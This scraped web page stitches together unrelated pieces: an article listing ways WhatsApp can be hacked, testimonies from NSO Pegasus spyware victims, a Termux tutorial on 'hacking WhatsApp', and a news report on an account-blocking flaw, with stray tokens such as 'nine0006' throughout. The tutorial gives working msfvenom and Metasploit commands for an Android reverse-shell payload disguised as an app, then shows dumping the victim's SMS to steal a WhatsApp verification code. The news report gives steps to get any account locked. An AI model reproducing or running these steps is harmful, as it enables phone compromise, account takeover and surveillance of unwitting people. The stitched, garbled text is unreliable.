How to hack whatsapp group with termux
9 Ways Your WhatsApp Messages Can Be Hacked
WhatsApp is a popular and easy to use messaging app. It has some security features, like the use of end-to-end encryption, which tries to keep your messages private. However, as good as these security measures are, WhatsApp still isn't immune to hacks, which can end up compromising the privacy of your messages and contacts.
Don't take our word for it: just go and see how many "How to hack WhatsApp" guides you'll find on the internet if you're persistent enough.
As knowing is half the battle, if we are simply aware of vulnerabilities, we can then take concrete steps to avoid comprising ourselves. To that end, here are a few ways that WhatsApp can be hacked.
1. Remote Code Execution via GIF
In October 2019, security researcher Awakened revealed a vulnerability in WhatsApp that let hackers take control of the app using a GIF image. The hack works by taking advantage of the way WhatsApp processes images when the user opens the Gallery view to send a media file.
When this happens, the app parses the GIF to show a preview of the file. GIF files are special because they have multiple encoded frames. This means that code can be hidden within the image.
If a hacker were to send a malicious GIF to a user, they could compromise the user's entire chat history. The hackers would be able to see who the user had been messaging and what they had been saying. They could also see users' files, photos, and videos sent through WhatsApp.
The vulnerability affected versions of WhatsApp up to 2.19.230 on Android 8.1 and 9. Fortunately, Awakened disclosed the vulnerability responsibly and Facebook, which owns WhatsApp, patched the issue. To keep yourself safe from this problem and similar, you should always keep WhatsApp updated.
2. The Pegasus Voice Call Attack
Another WhatsApp vulnerability discovered in early 2019 was the Pegasus voice call hack.
This scary attack allowed hackers to access a device simply by placing a WhatsApp voice call to their target. Even if the target didn't answer the call, the attack could still be effective. And the target may not even be aware that malware has been installed on their device.
This worked through a method known as buffer overflow. This is where an attack deliberately puts in so much code into a small buffer that it "overflows" and writes code into a location it shouldn't be able to access. When the hacker can run code in a location that should be secure, they can take malicious steps.
This attack installed an older and well-known piece of spyware called Pegasus. This allowed hackers to collect data on phone calls, messages, photos, and video. It even let them activate devices' cameras and microphones to take recordings.
This vulnerability is applicable on Android, iOS, Windows 10 Mobile, and Tizen devices. It was used by the Israeli firm, NSO Group, for example, which has been accused of spying on Amnesty International staff and other human rights activists. After news of the hack broke, WhatsApp was updated to protect it from this attack.
If you are running WhatsApp version 2.19.134 or earlier on Android or version 2.19.51 or earlier on iOS, then you need to update your app immediately.
Another way you're vulnerable to getting your WhatsApp hacked is through socially engineered attacks, which exploit human psychology to steal information or spread misinformation.
Security firm, Check Point Research, revealed one example of this attack, which they named FakesApp. This allowed people to misuse the quote feature in group chat and to alter the text of another person's reply. Essentially, hackers could plant fake statements that appear to be from other legitimate users.
The researchers could do this by decrypting WhatsApp communications. This allowed them to see data sent between the mobile and the web versions of WhatsApp.
And from here, they could change values in group chats. Then they could impersonate other people, sending messages which appeared to be from them. They could also change the text of replies.
This could be used in worrying ways to spread scams or fake news. Even though the vulnerability was disclosed in 2018, it had still not been patched by the time the researchers spoke at the Black Hat conference in Las Vegas in 2019, according to ZNet. It therefore becomes critical that you learn how to recognize WhatsApp scams and keep reminding yourself of these red flags periodically.
4. Media File Jacking
Media File Jacking affects both WhatsApp and Telegram. This attack takes advantage of the way apps receive media files like photos or videos and write those files to a device's external storage.
The attack starts by installing malware hidden inside an apparently harmless app. This can then monitor incoming files for Telegram or WhatsApp. When a new file comes in, the malware may swap out the real file for a fake one.
Symantec, the company that discovered the issue, suggested it could be used to scam people or to spread fake news.
There is a quick fix for this issue, though. Using WhatsApp, you should look in Settings and go to Chat Settings. Then find the Save to Gallery option and make sure it is set to Off. This will protect you from this vulnerability. However, a true fix for the issue will require app developers to entirely change the way that apps handle media files in the future.
5. Facebook Could Spy on WhatsApp Chats
In an official blog post, WhatsApp asserted that due to its end-to-end encryption, it is impossible for Facebook to read WhatsApp content:
"When you and the people you message are using the latest version of WhatsApp, your messages are encrypted by default, which means you're the only people who can read them. Even as we coordinate more with Facebook in the months ahead, your encrypted messages stay private and no one else can read them. Not WhatsApp, not Facebook, nor anyone else."
However, according to developer Gregorio Zanon, this is not strictly true. The fact that WhatsApp uses end-to-end encryption does not mean all messages are private. On an operating system like iOS 8 and above, apps can access files in a "shared container."
Both the Facebook and WhatsApp apps use the same shared container on devices. And while chats are encrypted when they are sent, they are not necessarily encrypted on the originating device. This means the Facebook app could potentially copy information from WhatsApp.
There is no evidence that Facebook has used shared containers to view private WhatsApp messages. But the potential is there. Even with end-to-end encryption, your messages may not be private from the all-capturing net of Facebook.
6. Paid Third-Party Apps
You'd be surprised how many paid legal apps have sprung up in the market, which solely exist for hacking into secure systems. It's super easy to carry out covert WhatsApp hacks through this method.
In fact, it isn't unheard of for big corporations to work hand-in-hand with oppressive regimes to target activists and journalists; or by cybercriminals, intent on getting your personal information.
Apps like Spyzie and mSPY can easily hack into your WhatsApp account for stealing your private data. All you need to do is purchase the app, install it, and activate it on the target phone. You can then simply sit back and connect to your app dashboard from the web browser, and snoop in on private WhatsApp data like messages, contacts, status, etc. But obviously, we advise against anyone actually doing this!
7. Fake WhatsApp Clones
Using fake website clones to install malware is an old hacking strategy still implemented by cyber criminals all over the world. These clone sites are known as malicious websites.
The hacking tactic has now also been adopted for breaking into Android systems. To carry out a WhatsApp hack on your account, an attacker will first try to install a clone of WhatsApp, which might look strikingly similar to the original app.
Take the case of the WhatsApp Pink scam, for instance. A clone of the original WhatsApp, it claims to change the standard green WhatsApp background to pink.
Here's how it works: an unsuspecting user receives a link to download the WhatsApp Pink app for changing the background color of their app. And even though it really does change the background color of your app to pink, as soon as you install the app, it will start collecting data not just from your WhatsApp but also from everything else stored on your phone.
8. WhatsApp Web
WhatsApp Web is a neat tool for someone who spends most of their day on a PC. It provides the ease of accessibility to WhatsApp users, so they won't have to pick up their phone again and again for messaging. The big screen and keyboard provides an overall better user experience too.
Here's the caveat though. As handy as the web version is, it can be easily used to hack into your WhatsApp chats. This danger arises when you're using the WhatsApp Web on someone else's computer.
So if the owner of the computer has selected the "keep me signed in" box during login, then your WhatsApp account will stay signed-in even after you've closed the browser.
The computer owner can then access your information without much difficulty.
You can avoid this by making sure that you log out from WhatsApp Web before you leave.
But as they say, prevention is better than cure. The best approach is to avoid using anything other than your personal computer for the web version of WhatsApp altogether.
9. Exporting Your Chats
This isn't the traditional method you'd find on the "how to hack someone's WhatsApp" guides. While some of the other methods are really elaborate, and some just capitalize on blank spots in the human psyche, this one simply requires physical access to your smartphone.
And no, the hacker doesn't need a lot of time with your phone, either; just a few seconds is enough. This gives them enough time to export your messages to a location they can later access. It could be anything: an email account, cloud storage, or even a messaging app.
Once a hacker has access to your phone, all they have to do is move to a specific chat, click on the Export chat option and select the location they'd like to move your message history to.
The solution? The ironclad way to protect yourself is to keep your phone away from unfamiliar hands at all times. Furthermore, you have the option to enable fingerprint lock for your WhatsApp. Here's how:
- Head to Accounts > Privacy > Fingerprint lock.
- Toggle the Unlock with fingerprint option on, and set the lock activation to Immediately.
Now, every time your WhatsApp is picked up after inactivity, your fingerprints will be required to launch the app.
Stay Aware of Security Issues in WhatsApp
These are just a few examples of how your WhatsApp can be hacked. While WhatsApp has patched some of these issues since their disclosure, some weak spots persist, so it's important to stay vigilant. To learn more about whether WhatsApp is safe, you need to brush up your knowledge of WhatsApp security threats. Always keep yourself updated!
NSO Group WhatsApp hack victims speak out, from India to Rwanda
Around the world, governments are using surveillance tools they have purchased from Israeli spyware firm NSO Group — the infamous creator of Pegasus — to monitor and crack down on human rights defenders. Access Now and our partners have repeatedly called on NSO Group and its investors to stop providing its products to countries who use them as tools of oppression, but the company has failed to take any meaningful steps to address these harms.
Since 2016 — when UAE human rights activist Ahmed Mansoor first uncovered NSO’s Pegasus on his iPhone — it has been detected in at least 46 countries around the world. Reports from Access Now, Citizen Lab, and others all show that an alarming number of people targeted using Pegasus have been journalists, lawyers, and activists, whose only crime was speaking out against and reporting on the injustices in their home countries. Citizen Lab has identified more than 100 such victims in a hack targeting WhatsApp users. The platform has since sued NSO Group in U.S. court, claiming NSO illegally used WhatsApp’s servers to hack into the phones of 1,400 of its users. The legal battle, which started in October 2019, is now under review in the 9th Circuit Court of Appeals over the issue of jurisdiction.
Despite all the evidence, NSO has continuously denied knowing about these abuses and has insisted their priority is to fight crime and prevent terrorism. Instead of taking meaningful action, NSO has instead tried to improve its image by creating sham human rights policies and advisory boards, and by developing a COVID-19 tracking app.
Five individuals who suffered from the WhatsApp hack have stepped forward to tell their stories — sharing the important work they are doing to protect human rights in their communities, how their governments used NSO Group’s products to surveil them, and consequences they have faced as a result.
Read their personal narratives below. Help ensure these brave human rights defenders’ stories are heard and that NSO Group is brought to justice for its failure to protect dissenting voices from its harmful tools.
- Lawyer
- Journalist
- Opposition Leader
- Activist
- Community Organizer
Bela Bhatia is an Indian human rights lawyer, activist, independent researcher, and writer. |
My name is Bela Bhatia. I live in Jagdalpur in Bastar district of Chhattisgarh state of India. I work here as a human rights lawyer and activist, independent researcher, and writer. Before shifting to live in Bastar in January 2015, I was an honorary professor at the Tata Institute of Social Sciences, Mumbai. My association with Bastar goes back to 2006. Bastar has been a site of a “war” between the Indian government and the Communist Party of India (Maoist) since 2005. Since then there have been scores of human rights violations involving the indigenous Adivasi residents of the villages of the war zone. I have been amongst other members of civil society who have documented, spoken out, and written against these excesses as well as represented victims in courts.
I believe I was targeted because the state and federal governments of India do not want individuals to witness or speak out against the impunity of the police and paramilitary while they carry out their plans to quell the Maoist movement with brutal force and illegal means. Besides issues related to the Maoist movement, there are other issues pertaining to governance and the democratic rights of citizens, especially Adivasis in this area — that comes under the Fifth Schedule of the Indian Constitution that allows them special protection — that are being trampled upon, for example, furthering the mining industry in the interests of private corporations without due process. The government is keen to discourage even nonviolent mobilization for upholding such democratic rights.
There has been continuous surveillance and harassment of independent observers and actors, whether local or visitors, in this area for many years, including local youth, especially educated youth, who have been harassed and arbitrarily arrested, social workers, journalists, lawyers, and academics who have been threatened, driven away, or framed under false charges.
Like others, I was also subjected to such surveillance, harassment, threats, and labelling — as a “Naxalite agent” and “urban Naxalite” — as well as attacks in diverse ways by police, paramilitary, and vigilante organizations during 2016-17. For example, an anonymous leaflet with my photo, labelling me as a Naxalite agent (an implicit incitement to violence), was circulated in the area by members of a hostile rally organized by a vigilante group in the village that I used to live in, in March 2016; my phone was snatched by a masked man when I was trying to report on a rally organized by police and vigilante groups in Jagdalpur, in September 2016; my effigy was burnt along with that of other activists by police in several district headquarters, in October 2016; and goons of a vigilante group attempted to threaten me in the night and attacked my house, a rented accommodation in a village, the following morning with the idea to evict me, in January 2017. Besides, I have been aware that my phone was most probably tapped and that my movements were often tracked.
Therefore, when I learnt from John Scott-Railton, a senior researcher at Citizen Lab, at the University of Toronto, that my phone had been hacked using spyware called Pegasus that was sold exclusively to governments by the Israeli cyber-warfare company NSO Group, I was not surprised. I saw that as a continuation of the older surveillance in a more sophisticated form.
The impact of these surveillance activities, culminating in the Pegasus operation, is that I am forced to work in an environment of suspicion and live a restricted life. Building trust among community members for any joint activity has become all the more difficult. Besides, I have not been able to live where I would have liked to, a village close to the town I live in now, where I was attacked in January 2017. I have also not been able to work in other capacities that I would have liked to; for example, I would have liked to have had some association with the university here, but university officials have also become wary of me.
Being targeted with international spyware has amplified all the earlier rumors and their possible consequences. The Pegasus operation has taken surveillance to a new level and made me even more controversial and vulnerable than I used to be. I also have to live with the constant apprehension of possible arrest based on false charges, as has already happened to several other activists in the country in recent times.
Aboubakr Jamaï is a Moroccan journalist and a winner of the Committee to Protect Journalists’ International Press Freedom Award. |
For more than 10 years, I have been a journalist in Morocco. I founded and led two weekly magazines. Our work won international awards, chief among them the Committee to Protect Journalists’ International Press Freedom Award. After multiple bans, and trumped-up defamation cases resulting in huge fines, I was forced out of the country in 2007. In 2010, the publications went bankrupt after a state-led advertisement boycott. After leaving Morocco, I started a new career working as a consultant and teacher.
On two occasions in the last two years, confidential work I did for my client was leaked to the media close to the Moroccan regime. In the articles on my work, content stolen from my phone was used to smear professional acquaintances. While in Morocco, I always acted with the assumption that my phones were tapped by the state. Outside of Morocco, I hoped I could work and make a living without the Moroccan state snooping on me and jeopardizing my work relationship with my professional partners. Thanks to Citizen Lab investigations, I learned that my phone was infected with Pegasus spyware. My clients too knew about it and have not resorted to my services since then.
As a professor, I am in charge of the international relations departments of a France-based study abroad program. Most of our students are U.S. citizens. Part of my duties is to organize and lead travelling seminars in Morocco. Since the spying revelations, I worry about taking our students to Morocco.
Being spied on by an authoritarian state does not only spoil your professional relationships, it reduces your social circle too. You put at risk your relatives and friends by the mere fact of freely talking to them on the phone. They consequently tend to reduce their interactions with you. Most of my family lives in Morocco. Although I go back occasionally to my home country and see my relatives, most of my interactions with them are through the phone. Knowing that our conversations are snooped on is emotionally distressing for them and for me.
Placide Kayumba is a Rwandan activist and a member of the opposition in exile. |
I’m quite sure I was targeted because I have been criticizing the government of Rwanda. This government is a dictatorship. You know exactly how the government of Rwanda works. When I was a student [in Belgium], we started a nonprofit organization (Jambo- asbl) that began to publish another narrative about Rwanda, the government, the regime. I was the first president of this organization. We started a website with information, I wrote some articles (Jambo News), and organized some conferences, demonstrations, to raise awareness in Rwanda and the “Great Lakes” region in general.
I was targeted by the government officials in 2015 or 2016. I also joined an opposition party with Victoire Ingabire. In 2018, I went on the board of the political party [the United Democratic Forces/ Forces Democratiques Unifiées – Inkingi, also known as FDU-Inkingi] and I continued to raise awareness and struggle for change from dictatorship to democracy.
During those years, some people were killed in Rwanda, including colleagues in the party. Anselme Mutuyimana was arrested in the north in Rwanda; some people found his body. The Vice President of the party, Boniface Twagirimana, was disappeared [from his prison cell] in October 2018. We still don’t know where he is but presume he’s dead. Eugene Ndereyimana is another member of the party who disappeared.
I have been criticizing [these disappearances] and am trying to get some support from human rights groups, like Amnesty and the UN human rights agency. We need help to find out what happened to those people, an independent investigation. The government won’t investigate this.
I was considered an enemy of the state. I’m not surprised that I was targeted by spyware [so that the government can] see who I was in touch with in Rwanda. Maybe those people who were killed were targeted because they were people in their party [the FDU]. I exchanged some messages [with them], nothing that could be considered criminal, and discussed with them what they can do to mobilize many people to get toward democracy, more liberty, and freedom of expression.
People’s houses were destroyed because they have no official land titles. To find a way to get the land, [they were] thrown on the streets, became homeless, [and given] no financial funds from the government. I was working on this with people in Rwanda. I was targeted because I was a human rights activist and they didn’t like it. They don’t like people who fight them. [Not] fight them, but try to get more freedom from them. I want them to be more open to other visions, other political actors.
[I found out I was targeted after] I read an article in the Financial Times, and Rwanda was mentioned as a country that used this spyware. I could guess I was surely targeted. There’s a history of attacks on social networks from officials.
The confirmation that I was targeted came from WhatsApp, when WhatsApp started to work with Citizen Lab. Citizen Lab contacted me with some questions, to see if my phone had some abnormalities. They explained that there had been an attempt to attack my phone/device. Then they informed me that WhatsApp would send a message to inform all people who had been targeted. A few days later I received a message from WhatsApp. I don’t know if they [the government] took something from my phone. That’s the big question.
What’s harmful is that they know about your family, where your children go to school. When you exchange messages, you don’t know whether someone else could have [access to] them, [someone] that has criminal plans against you.
There are many impacts [that the targeting had on me]. My friends now don’t contact me easily. They think my phone is under surveillance. My social life was impacted.
My security – I cannot move freely where I want because they can locate where I am. These are the things you think about when these things happen to you. There are some places where I cannot go easily. Mainly Africa, as they can kill people easily in some countries in Africa. For my security, I cannot move except in some countries where I feel safe (U. S. and in Europe). Even in Belgium, we know there are some cells that are in Belgium.
Financially – it’s difficult to say. I have to adapt the way I communicate when I contact some people. I have to be sure it’s safe. I have to find ways to communicate outside usual channels. It can cost some money. I have to move to see people face-to-face to make sure I’m not being listened to. It’s another way of living.
Professionally – if somebody can pay so much to control/monitor your communication, he’s ready to do much more. In time, they [the government] could put some information in my devices (my professional devices), and through that they can steal everything in my phone, they can record messages from themselves in my phone. I fear that.
When I learned that they had targeted my phone, I had no idea this could happen. Especially using WhatsApp, which everyone says is so secure.
Something in my mind changed the way I see technology. I don’t trust it anymore. For me everything can be targeted, and they can spy however they want.
For me, any application can have some vulnerability. In my mind, my assumption is that every channel of communication can be spied on. The only way to be sure [to be free of communications surveillance] is to go see someone in person without your phones in a place where there is no possibility [of being spied on].
[On achieving justice in] Rwanda – if I were to go to Rwanda, they will be happy to put me in jail or kill me. Because they kill people like Anselme Mutuyimana [who] had no place on the board in our party [he was an assistant to Victoire Ingabire]. I was the third Vice President [of the FDU]. If they could kill him like that, you can imagine what they would do if they found me. There’s no justice in Rwanda for anything. Even people who are now homeless because they [the government] decided to give their homes to rich friends. There’s no justice in Rwanda. It’s not safe for me there.
[On achieving justice in] Belgium – [I] could go for justice in Belgium. It’s more trustworthy. But for me, I’m very small. I’d be against a huge organization like NSO Group, which has many resources. It would be a waste of time for me and loss of money for me to go for justice in Belgium. For what result? Even if NSO Group is condemned here in Belgium, this won’t prevent Rwanda from trying to find another way to threaten or kill people like me. The result is not worth it to me.
The real way to change things for me is to change the government in Rwanda. As long as RPF has resources from many countries in the E.U., U.S., U.K., or Congo, as long as they have enough resources to kill people wherever they want (Kenya, South Africa, Australia), [I won’t be safe]. Filing a case for justice here in Belgium, will cost so much for me. For them it’s just details.
Some years ago, we filed a case in the Arusha court [the African Court on Human and Peoples’ Rights (AfCHPR)], [in which] Rwanda was condemned in the case of Victoire Ingabire [Ingabire Victoire Umuhoza v. The Republic of Rwanda, App. No. 003/2014]. Her case in Rwanda was not just; she was jailed for eight years for nothing. Until now, Rwanda hasn’t done anything about that. Even the result in justice [is] not a solution for us. The solution is to get democracy and freedom in Rwanda; it’s the only way to stop the killing and looting, the only solution.
What I expect from the case in the U.S. — if it’s possible to get NSO Group to pay for what those governments did to activists, it would send a message to all companies that help dictatorships in criminal processes. I hope that the U.S. will consider that companies that spy on people should have no support. The U.S. government is one of the [biggest] contributors [of aid] to Rwanda.
Fouad Abdelmoumni is a Moroccan human rights and democracy activist, who works with Human Rights Watch and Transparency International Morocco. |
I feel invaded, harassed, and severely violated. I am Fouad Abdelmoumni, a 62-year-old Moroccan man. I was subjected to torture, imprisonment, and several years of enforced disappearance, outside any proper legal framework, when I was just 20 years old. Yet I am experiencing as much more violent the current violation of my privacy, the distribution of information or intimate and sexual videos where I appear to be with another person, and the harassment and the threats against my loved ones.
I am a human rights and democracy activist (one of my roles is as a board advisor for Human Rights Watch – MENA), as well as a campaigner for Transparency International (a movement that fights corruption, for which I chaired the Moroccan Chapter a few years ago). I have no partisan political affiliation, although I regularly speak out against authoritarianism, corruption, and predation in my country and elsewhere.
I became one of the targets of Morocco’s repressive system a few years ago, but until now I had only ever been attacked in insidious ways. The pro-regime press, which specializes in slandering opponents and critical voices, regularly targets me, peppering its floods of lies with the odd fact taken from reality, which could only be obtained by powerful organizations that are able to access my private spaces, documents, and communications. In October 2019, I was contacted by the Citizen Lab, which, as part of a project commissioned by WhatsApp, had identified my telephone number among those hacked using spyware that makes it possible to access all the content and functions of my communication tools. In light of that, I posted the following statement on my Facebook page: “States, including the Moroccan State, behave like Mafias, but that can’t protect their oppression and corruption forever.” The following month, my sister received a call, purportedly from the police, informing her that I had been imprisoned, which was completely untrue. Together with seven other victims of the spying, I lodged an investigation request with the National Control Commission for the Protection of Personal Data (CNDP). The CNDP did nothing, arguing that it does not have jurisdiction over those types of matters (according to its president, who agreed to meet me but never provided the written response to our complaint that he promised). Then, in January 2020, one of the sites that does dirty work within the system of political repression, posted a video insulting and threatening me, as well as invading my private life. On February 13, 2020, six videos of several minutes each, showing my partner and I — or people who closely resemble us — in explicit sexual situations, were sent to dozens of people. In parallel, I have been subjected to severe harassment by services of the administration, including exorbitant tax audits and cancellation of decisions awarding investment grants for a value of more than USD 30,000. Then, in October 2020, further attacks in the gutter press pried into not only my private life, but also that of other people whose only crime was to be friends of mine, going as far as publishing confidential information about the family status of an 11-year-old child, even revealing his identity.
I am someone who refuses to act in the shadows and I aim to never say anything in confidence that I wouldn’t be prepared to defend in front of any audience. But that certainly doesn’t mean that I accept others interfering in my private life or having my privacy or that of the people with whom I keep company exposed to voyeurism. It should be underlined that I live in Morocco, a country where, by law, prison sentences can be handed down for extramarital sex and where society is very intolerant about sexual freedom, particularly for women.
The details that I am recounting here are not linked only to the hacking of my phone, although that is a key aspect of the system of espionage and Mafia-style harassment to which myself and others are being subjected. I have always accepted the risk that microphones and cameras could be installed in places where I might think I am in private. But until a year ago, I still believed that the Moroccan regime was not so crooked that it would use those recordings to blackmail its opponents and terrorize critical voices. I certainly didn’t think that it would expose itself so directly, knowing that no one will believe that the meddling, recordings, campaigns of denigration, and harassment in various forms are not deliberate, well-orchestrated, and determined action at very high levels of the Moroccan State. Today, certain actions reveal just how awful those behaviors are and make it possible to publicly condemn the perpetrators. I hope that credible judicial systems will take up this task, for my dignity and that of the other people who have been attacked as collateral victims, so that elites in Morocco and around the world are no longer in terror of having their private lives and sex lives divulged.
PS: In 1984, toward the end of my second year of “incommunicado” disappearance, totally isolated from the world, handcuffed and blindfolded for days and months on end, a subcommittee of the United States Senate received the Ambassador of Morocco in preparation for King Hassan II’s visit to the U.S. Amnesty had submitted my case to some of the senators who asked what had happened to me. The ambassador replied that it was all a fabrication and invited any of the senators to accompany him to Morocco, saying that he would take them to my house to have tea together. He immediately informed the Moroccan Ministry of Foreign Affairs about the exchange, which referred the matter to the Ministry of Justice. The Attorney General of the King contacted the heads of the police, who told him that they were very happy that my case was finally being recalled, as they had absolutely nothing against me and had just been waiting for the green light from the palace to release me. As my father was a senior official in the Ministry of Justice, his colleagues hurried to give him the good news. A few days later, the official, written response from the police was received by the Ministry of Justice: “We have had no information about Mr. Fouad Abdelmoumni for years and do not know where he is…”
Father Pierre Marie-Chanel Affognon is a Togolese Catholic priest and the founder of a movement to promote constitutional, institutional, and electoral reform in Togo. |
[I found out I was targeted because] WhatsApp brought it to my attention; Citizen Lab in Canada contacted me following the WhatsApp message and confirmed it, and the facts strictly about my private life as well as other people’s [lives] have been mentioned in truncated form.
It is difficult to describe [the impact the targeting had on me] and painful to relate repeatedly. In any case, it is exactly like being undressed by someone in public, stripped naked, and you are powerless before an invisible hand and a terrifying faceless force. It is also an enormous shock when one considers the public money spent acquiring the Israeli software whilst in my country, Togo, there is destitution everywhere.
It is impossible to get justice in Togo. Togo has a regime which on the face of it is democratic. There is no justice possible in this matter because the judges are afraid to state what the law is. But I, I rely on God and on the organizations defending human rights in my country and internationally to put an end to these grave deviations which destroy democracy and the rule of law.
We thank Human Rights Watch, Internet Freedom Foundation, Committee to Protect Journalists, and others who helped bring to light these stories, but most importantly, the courageous survivors of the NSO hacking themselves.
How to hack WhatsApp using Termux? – Telegraph
Termux - one ❤️Termux - one ❤️
Hello guys in this post I am going to explain how you can use Termux to hack whatsapp let's see if we can really hack someones whatsapp account with termux?
The point is that using SS7 in Termux is not possible and therefore we are not going to do SS7 expiration in Termux, instead I will tell you how you can hack with some available tools
Please pay attention! The author of this article is not responsible for any consequences following the use of the information provided. All materials published for educational purposes only!
Before proceeding you should know how to use Termux, if you are a beginner follow the link below to learn how to use Termux effectively for ethical hacking, or if you are familiar with Termux you can install the popular hacking tools in termux. nine0006
If you are interested in hacking whatsapp with termux then you need to remember some senerios.
- In most cases, you need OTP to verify WhatsApp
- You and your victim must be connected to the same Wi-Fi (Spoofing)
- Or you must somehow hack the victim
Sounds terrible ☹️
Hacking WhatsApp with Termux is a bit more difficult and the success rate is quite low.
Most of you guys are asking how to use QRjacker in Termux,
Please note that QRjacker does not work in Termux, so we can use it in Termux if we install Kali Linux in Termux
So in this tutorial I will tell you how to install Metasploit in Termux and generate the payload, then install payload to the victim's phone, and then remote access to the phone via the Internet.
Install Termux first
Then type below command to install Metasploit Framework
apt update && apt upgrade && apt install unstable-repo && apt update && apt install metasploit && msfconsole
That's it, Metasploit Framework will be installed in Termux
Now you need to create the payload
To do this type this command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=ur IP LPORT=anyport -a dalvik --platform android R > /sdcard/appname. apk
In LHOST you have to put your local IP address, you can get IP by typing ifconfig
in Termux
In LPORT you can give any port
After pressing the following command
Now the appname.apk file will be created on your SD card.
You can give any name, but I chose the name of the application
Now you need to install the APK file in the victim's phone.
After installation, you can listen to it
To do this, you need to start the Metasploit framework and enter the command below
msfconsole -x “use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST your IP; run”
That's it, you can listen to it
You can do some things like access the camera, files, read contacts
Since we are going to hack whatsapp, for this we need to install whatsapp on our phone, or we can use Parallel Space
during registration you must provide the victim's phone number
Now the OTP will be sent to his mobile phone
It's time to use the dump_sms command
After that it will create a . txt file which contains the SMS
Now you can use nano to read the message
And copy the code and use it to check whatsapp
that's it so we can hack whatsapp with termux
Any WhatsApp user can have their account taken away. You don't need to be a hacker to do this
software Soft Security User Internet Internet software nine0102 Technique
|
Share
WhatsApp has a flaw that allows attackers with zero hacking and programming skills to permanently block any user's account. They only need to know their phone number and nothing else, and there is no way to protect themselves from potential blocking. WhatsApp developers are in no hurry to fix the problem. nine0006
New bug in WhatsApp
Each WhatsApp user can lose their profile at any second with a minimal chance of recovery. According to Forbes, it is simply impossible to protect against this, and the attacker will not even need to hack the gadget - he just needs to know the user's phone number, after which he can initiate the procedure for blocking him without the possibility of re-authorization in the system.
nine0005 The ability to deprive anyone of using WhatsApp is a consequence of a giant vulnerability discovered in the messenger by information security experts Luis Carpintero and Ernesto Pereña (Ernesto Canales Pereña). They notified the developers of WhatsApp about their discovery, but they have not yet released a patch that fixes the breach, thereby leaving 2 billion users at risk of losing their account.WhatsApp does nothing to protect users from blocking their profile
WhatsApp is the most popular instant messenger in the world. According to Statista.com, in terms of the number of monthly active users as of January 2021, with its more than 2 billion, it was ahead of Facebook Messenger (1.3 billion) and Chinese WeChat (1.21 billion), along with QQ (617 million). WhatsApp has been owned by Facebook since February 2014.
How the vulnerability works
Vulnerability in WhatsApp makes it possible to completely block the victim's account and is carried out in two very simple steps, in each of which the perpetrator does not even need hacking or social engineering skills - he will not contact the profile owner at all. nine0006
WhatsApp standard login window
At the first stage, an attacker simply needs to install WhatsApp on a smartphone and try to log in using the desired phone number. The messenger will send him an SMS with a confirmation code, and here there is a calculation that the owner of the number will ignore them. After several such attempts, the application on the attacker's device will report too frequent authorization attempts and allow the next one only after 12 hours. At the same time, WhatsApp on the victim’s device will continue to work as before. nine0006
Notification that authorization was not possible due to an excessive number of attempts
In the second step, the attacker registers a new email address and writes a letter to WhatsApp technical support saying that his account was lost or stolen. He asks to turn it off and indicates the number of the victim. WhatsApp can send an automatic email asking you to write the number again, and the attacker will do it.
Letter to WhatsApp technical support requesting blocking
Further, WhatsApp, without making sure that the real owner of the account wrote to technical support, initiates the blocking procedure. After about an hour, the messenger will suddenly stop working on the victim's device - she will see a message that her number is no longer registered in the system. “It could be because you registered it on another phone. If you haven't done so, verify your phone number to log into your account again," the notification will say. nine0006
WhatsApp response confirming that the request has been fulfilled
All of this will work even if the user has enabled two-factor authentication. An attempt to request a new code will fail - WhatsApp will allow you to do this only after 12 hours.
Bonus stage and full blocking
If the attacker decides to stop at the second stage, then everything will end up with just the inability of the user to connect to WhatsApp with his number for several hours. After a maximum of 12 hours, the user will be able to regain control over his account and continue working in the messenger exactly until someone wants to repeat the "trick" with the blocking. nine0006
But in fact, there is an additional, third stage, leading to a complete blocking of the account.
This stage can actually be the second - the attacker does not have to send a letter to WhatsApp support, he can just wait 12 hours, and then again make several attempts to register someone else's number on his phone. After the third 12-hour blocking, WhatsApp will break, and instead of a timer counting down the time until the next authorization attempt, it will show “-1 second”, moreover, constantly. This is a malfunction in the messenger, which cannot be bypassed. nine0006
A stuck timer on the phones of the victim (left) and the attacker
This picture will be observed both on the hacker's device and on the victim's smartphone, and as a result, no one else will be able to log in to the messenger using this phone number. The only thing left is to try to contact WhatsApp technical support and look for ways to solve the problem.
Whatsapp does not solve the problem
A Forbes article shedding light on a new WhatsApp issue was published on April 10, 2021. By April 13, 2021, the developers have not released an update to fix it and have not set a release date for it. nine0006
IT companies can be reimbursed up to 80% of marketing costs
IT industry support
Instead, they are preparing to implement a new privacy policy that will automatically transfer huge amounts of user data to Facebook for better ad targeting.
This policy was intended to be implemented by WhatsApp on February 8, 2021, but was forced to temporarily abandon this idea due to a flurry of criticism. The new date for its entry into force is May 15, 2021, and all those who are not going to agree with it are in for a very serious punishment. nine0006
In February 2021, CNews wrote that those who disagree with the new WhatsApp privacy policy will no longer be able to send and receive text messages. Developers will leave them only voice calls. Moreover, the profiles of those users who stop using WhatsApp and switch to other messengers are guaranteed to be completely deleted.
WhatsApp other issues
WhatsApp is known not only for the fact that it is used by billions of people, but also for the fact that if it appreciates its users, it is far from always. So, for example, in June 2020, it became known that some phone numbers linked to user profiles in WhatsApp had been in the public domain for a long time and even got into Google search results. In total, with the help of Google, it was possible to find up to the number of about 300 thousand users of the messenger, and this problem was of a global nature. nine0006
WhatsApp is still in first place in terms of the number of users
In November 2019, CNews reported that WhatsApp users were automatically permanently banned for participating in harmless group chats. It turned out to be possible to fall under sanctions for changing the name of the chat to something that would seem to the moderators of the service as something sinister, illegal or malicious.
Evgenia Ukraintseva: Automation of HR processes should begin with the digitalization of the organizational structure
HR Tech 2022 nine0006
At the same time, WhatsApp was in no hurry to fix this failure. The employees of the messenger responded to all requests from the victims about the reasons for blocking that the users themselves violated the rules of the service, and the fault in blocking lies solely with them.